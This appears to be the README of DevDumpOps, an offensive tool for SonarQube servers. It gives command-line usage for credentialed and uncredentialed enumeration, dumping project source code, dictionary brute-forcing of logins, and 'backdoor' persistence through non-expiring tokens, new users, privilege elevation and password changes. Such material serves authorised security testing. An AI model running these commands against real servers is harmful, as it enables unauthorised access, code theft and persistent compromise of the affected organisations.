🛠️ In construction 🛠️
Open Source tool for the information dump of DevOps platforms, focused on the abuse of Tokens, APIS and exposed service accounts that allow us to consult these development tools; From a security perspective, it is very useful and convenient to be able to reconstruct the source code, extract configuration files, deployment data and as much information as possible from these platforms, for subsequent intrusion processes.
git clone https://github.com/CSL-LABS/DevDumpOps.git
cd DevDumpOps
python DevDumpOps.py --help
- Sonarqube
- otros
en construccion
Enumerates the SonarQube server configuration, as well as permissions, organizations, projects, and code components visible with or without credentials.
All visible code components are downloaded and stored:
- all
- The code of all projects
- member
- The code linked to the credentials (useful for SonarCloud.io)
Perform a brute force attack on the Login system, using the following parameters:
- User to attack.
- Dictionary path.
- Number of threads to use.
Select one of the following persistence modes, it is necessary to have previous privileges:
- Create new user.
- Generate a new token.
- Elevate privileges to a user.
- Change a user's password.
- Enumeration without using credentials:
python DevDumpOps.py --sonarqube [target]
- Download code for public projects:
python DevDumpOps.py --sonarqube --dump all [target]
- Enumeration using credentials:
python DevDumpOps.py --sonarqube -u admin -p admin [target]
- Download code for private projects:
python DevDumpOps.py --sonarqube -u admin -p admin --dump member [target]
- Download code in SonarCloud projects:
python DevDumpOps.py --sonarqube -t [token] --dump member sonarcloud.io
- Brute Force Attack:
python DevDumpOps.py --sonarqube --bruteforce [target]
Username: administrator
- Generate Persistence: Generate a new token It is important to remember that tokens do not expire, therefore, even if the user's password is changed, the token will continue to be valid.
python DevDumpOps.py --sonarqube --backdoor -u administrator -p P4$$w0rd [target]
Option: 2
The results are stored by default in the /results/ folder or in the one defined under the --output option, and the following information is found:
- Configuration SMTP, GITHUB, GITLAB Y SVN
- Identified users
- Visible projects
- Downloaded code
- Code components
- Extracted WebHooks
- User Tokens